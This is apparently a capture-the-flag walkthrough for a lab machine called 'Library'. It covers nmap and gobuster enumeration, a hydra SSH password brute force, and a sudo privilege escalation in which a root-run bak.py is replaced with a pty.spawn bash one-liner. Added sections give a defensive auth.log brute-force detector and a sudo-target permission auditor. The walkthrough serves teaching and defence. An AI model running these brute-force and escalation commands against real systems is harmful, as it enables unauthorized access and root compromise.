# Library

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQD2Bfrr7tfh5HkVz4%2F-McQD5e313TgVcGeL7j5%2Fimage.png?alt=media\&token=60c7ef0a-e869-4f84-912b-3ac0beac7c0c)

## Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as online" flag (**-Pn**), which skips host discovery:

```
nmap -Pn 10.10.121.105
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQDKj6WbjRAAubwIL4%2F-McQDkqutBBnV0UmzaCl%2Fimage.png?alt=media\&token=9f5bf796-6060-45f5-bb70-76cb7bc29310)

Detailed nmap scan:

Command breakdown:

* **-sV**: Service version detection
* **-sC**: Default nmap scripts
* **-p 22,80**: Scan only ports 22 and 80
* **-oN nmap**: Save the output into a file called `nmap`

```
nmap -sV -sC -p 22,80 -oN nmap 10.10.121.105
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQDKj6WbjRAAubwIL4%2F-McQDurr0GhfB8IsC9IL%2Fimage.png?alt=media\&token=86013595-2322-46c9-afb5-eeb9508e528a)

## Enumeration

Let's visit the webpage.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQDKj6WbjRAAubwIL4%2F-McQE23d1bajrG2bXDKv%2Fimage.png?alt=media\&token=69a05369-fda5-4d88-9b0e-560135072ca4)

Looking through the website, we find a username: `meliodas`.

Let's look at `robots.txt`, as nmap told us there is a disallowed entry.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQDKj6WbjRAAubwIL4%2F-McQEh9ZZZ8wI8fPSMe0%2Fimage.png?alt=media\&token=437c71e0-f5ee-4b9a-9fd5-84a4e915816d)

And there is nothing there. Let's run `gobuster` to find hidden directories, as there is nothing else on the main page to enumerate.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQDKj6WbjRAAubwIL4%2F-McQF8wv4ZJqU97KTCVM%2Fimage.png?alt=media\&token=f44e1b22-f3d0-40a0-8eb0-3d44f7dea336)

Nothing interesting pops up, so let's run hydra to brute-force SSH with the username `meliodas`.

## Exploitation

```
hydra -l meliodas -P /usr/share/wordlists/rockyou.txt ssh://10.10.121.105/
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQFtTxYJCO52yWiAx9%2F-McQG9Sw_PL2Id91NjeD%2Fimage.png?alt=media\&token=16be53c0-74d5-4fc9-a8e2-3a3688269ca9)
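From the defender's side, a hydra run like the one above is loud: sshd writes one `Failed password` line per guess, all from one source, in a burst, usually followed by an `Accepted` line once the password is found. The following detector is an added example, not part of the original writeup; it parses a constructed set of auth.log lines (the addresses 198.51.100.7 and 192.0.2.20 are documentation-range placeholders, and the host name, PIDs and timestamps are made up) and flags a source that fails a threshold number of times within a sliding window, plus any later success from that source.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample of sshd auth.log lines (not taken from the page); the
# addresses 198.51.100.7 and 192.0.2.20 are documentation ranges used as
# placeholders. A Hydra run shows up as a rapid burst of "Failed password"
# lines for one account from one source, often followed by an "Accepted".
SAMPLE_LOG = """\
May  1 10:00:01 library sshd[1201]: Failed password for meliodas from 198.51.100.7 port 51000 ssh2
May  1 10:00:01 library sshd[1202]: Failed password for meliodas from 198.51.100.7 port 51001 ssh2
May  1 10:00:02 library sshd[1203]: Failed password for invalid user admin from 198.51.100.7 port 51002 ssh2
May  1 10:00:02 library sshd[1204]: Failed password for meliodas from 198.51.100.7 port 51003 ssh2
May  1 10:00:03 library sshd[1205]: Failed password for meliodas from 198.51.100.7 port 51004 ssh2
May  1 10:00:03 library sshd[1206]: Accepted password for meliodas from 198.51.100.7 port 51005 ssh2
May  1 10:05:00 library sshd[1301]: Failed password for meliodas from 192.0.2.20 port 40000 ssh2
May  1 10:45:00 library sshd[1402]: Accepted publickey for meliodas from 192.0.2.20 port 40010 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_line(line):
    """Parse one sshd auth line into a dict, or None for lines we do not model."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    # Syslog timestamps carry no year; strptime defaults to 1900, which is fine
    # because only differences between timestamps are used below.
    ev["ts"] = datetime.strptime(" ".join(ev["ts"].split()), "%b %d %H:%M:%S")
    return ev


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Flag sources with >= threshold failures inside a sliding window, and any
    later successful login from a flagged source."""
    recent = defaultdict(deque)  # source ip -> timestamps of recent failures
    flagged = set()
    alerts = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        ip = ev["ip"]
        if ev["result"] == "Failed":
            q = recent[ip]
            q.append(ev["ts"])
            while (q[-1] - q[0]).total_seconds() > window_seconds:
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("bruteforce", ip, len(q)))
        elif ip in flagged:  # "Accepted" after a burst: likely a guessed password
            alerts.append(("success_after_bruteforce", ip, ev["user"]))
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

On a real host the same function can be fed the contents of `/var/log/auth.log`; the single failure from 192.0.2.20 followed much later by a key-based login stays below the threshold and is correctly ignored, while the burst from 198.51.100.7 raises both alerts. Rate limiting with `fail2ban` or disabling `PasswordAuthentication` in `sshd_config` are the usual mitigations for what this detector sees.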

We have the password; let's log in through SSH.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQFtTxYJCO52yWiAx9%2F-McQGT1agcb29OqzrQHc%2Fimage.png?alt=media\&token=aaddbbfa-c12e-4c69-bbd0-e1358dc8a729)

We can read the `user.txt` file.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQGUTJiUMn1RZRpEyN%2F-McQGbsbTnslgXXYlg1W%2Fimage.png?alt=media\&token=fa28bb6a-f7f3-43c7-bc6e-c236161e0b53)

## Privilege Escalation

We have a file called `bak.py`; let's read it and look at the file's permissions.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQGUTJiUMn1RZRpEyN%2F-McQGwPrLV6c0boKFbBw%2Fimage.png?alt=media\&token=2a45d55e-6352-470b-85c7-00d9fc7bafe7)

It's owned by root! We can also run this file as root.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQGUTJiUMn1RZRpEyN%2F-McQHBc7IcNLzmw2gOXa%2Fimage.png?alt=media\&token=644126aa-ac74-42dc-bab6-a4ec36fed94e)

Let's change the contents of the file to get a shell as root. We cannot edit the file itself, since it is owned by root, but it lives in our own home directory, so we can remove the file and create a new one with the same name and our own content.

First delete the file with this command:

```
rm bak.py
```

Now we can echo the script into the file:

```
echo 'import pty; pty.spawn("/bin/bash")' > /home/meliodas/bak.py
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQGUTJiUMn1RZRpEyN%2F-McQI5rQhHYruNV2983A%2Fimage.png?alt=media\&token=9a954026-d0c7-49c3-a6cf-f9be25406c65)

Now let's run the file.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQGUTJiUMn1RZRpEyN%2F-McQIDvUOqwGQ0-MrIo4%2Fimage.png?alt=media\&token=83fcbaa8-b3d9-4dac-be68-51231be106be)

We are now root, and we can read the `root.txt` file.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQGUTJiUMn1RZRpEyN%2F-McQINgHKsxxQDyOhP9s%2Fimage.png?alt=media\&token=b70c1423-2f26-43da-9559-a75377047212)
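The root cause here is not the file's own permissions (root-owned, not writable) but the directory it sits in: anyone who can write to the parent directory can unlink a file and recreate it under the same name, so a sudo rule pointing at a script in a user's home directory is effectively a rule pointing at whatever that user wants. The audit below is an added example, not code from the writeup; it encodes the POSIX write and sticky-bit rules and checks a sudo target against them. The uid 1000 for `meliodas` and the mode bits are assumptions chosen to mirror the screenshots, and the hardened layout (script in a root-owned directory) is what the same check should report as clean.

```python
import os
import stat
from dataclasses import dataclass


@dataclass(frozen=True)
class Meta:
    """Owner uid, group gid and st_mode bits of one filesystem object."""
    uid: int
    gid: int
    mode: int


def _can_write(m, uid, gids):
    """POSIX write check: the owner class applies exclusively, then group, then other."""
    if uid == 0:
        return True
    if m.uid == uid:
        return bool(m.mode & stat.S_IWUSR)
    if m.gid in gids:
        return bool(m.mode & stat.S_IWGRP)
    return bool(m.mode & stat.S_IWOTH)


def sudo_target_weaknesses(script, parent, uid, gids):
    """Return the ways user `uid` could change what a sudo rule pointing at `script` runs."""
    issues = []
    if _can_write(script, uid, gids):
        issues.append("script is writable: contents can be edited in place")
    if _can_write(parent, uid, gids):
        # A writable directory lets the user unlink the root-owned file and
        # create a new one under the same name. The sticky bit (as on /tmp)
        # blocks that unless the user owns the file or the directory.
        sticky = bool(parent.mode & stat.S_ISVTX)
        if not sticky or parent.uid == uid or script.uid == uid:
            issues.append("parent directory is writable: script can be deleted and replaced")
    return issues


def audit_script(path, uid=None, gids=None):
    """Audit a real path on this host for the calling user (or a given uid/gids)."""
    uid = os.getuid() if uid is None else uid
    gids = set(os.getgroups()) if gids is None else set(gids)

    def meta(p):
        st = os.stat(p)
        return Meta(st.st_uid, st.st_gid, st.st_mode)

    parent = os.path.dirname(os.path.abspath(path))
    return sudo_target_weaknesses(meta(path), meta(parent), uid, gids)


# Constructed metadata mirroring the writeup's layout (uid 1000 for meliodas is
# an assumption): a root-owned script inside the user's own home directory.
MELIODAS_UID = 1000
BAK_PY = Meta(0, 0, 0o100644)                               # -rw-r--r-- root root
HOME_MELIODAS = Meta(MELIODAS_UID, MELIODAS_UID, 0o040755)  # drwxr-xr-x meliodas
# Hardened layout: the script lives in a root-owned directory.
ROOT_DIR = Meta(0, 0, 0o040755)                             # drwxr-xr-x root root
TMP_DIR = Meta(0, 0, 0o041777)                              # drwxrwxrwt root root (sticky)


def findings_for_writeup():
    return sudo_target_weaknesses(BAK_PY, HOME_MELIODAS, MELIODAS_UID, {MELIODAS_UID})


def findings_for_hardened():
    return sudo_target_weaknesses(BAK_PY, ROOT_DIR, MELIODAS_UID, {MELIODAS_UID})


def findings_for_sticky_tmp():
    return sudo_target_weaknesses(BAK_PY, TMP_DIR, MELIODAS_UID, {MELIODAS_UID})


if __name__ == "__main__":
    for name, fn in [("writeup layout", findings_for_writeup),
                     ("hardened layout", findings_for_hardened),
                     ("sticky /tmp", findings_for_sticky_tmp)]:
        print(f"{name}: {fn() or ['no weaknesses']}")
```

`audit_script` runs the same check against a live path for the current user, which is the form to use when reviewing the targets of each `sudoers` entry on a host; the constructed cases show that moving `bak.py` into a root-owned directory such as `/usr/local/sbin` (mode 755) removes the weakness, and that a sticky directory only helps when the user owns neither the file nor the directory.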
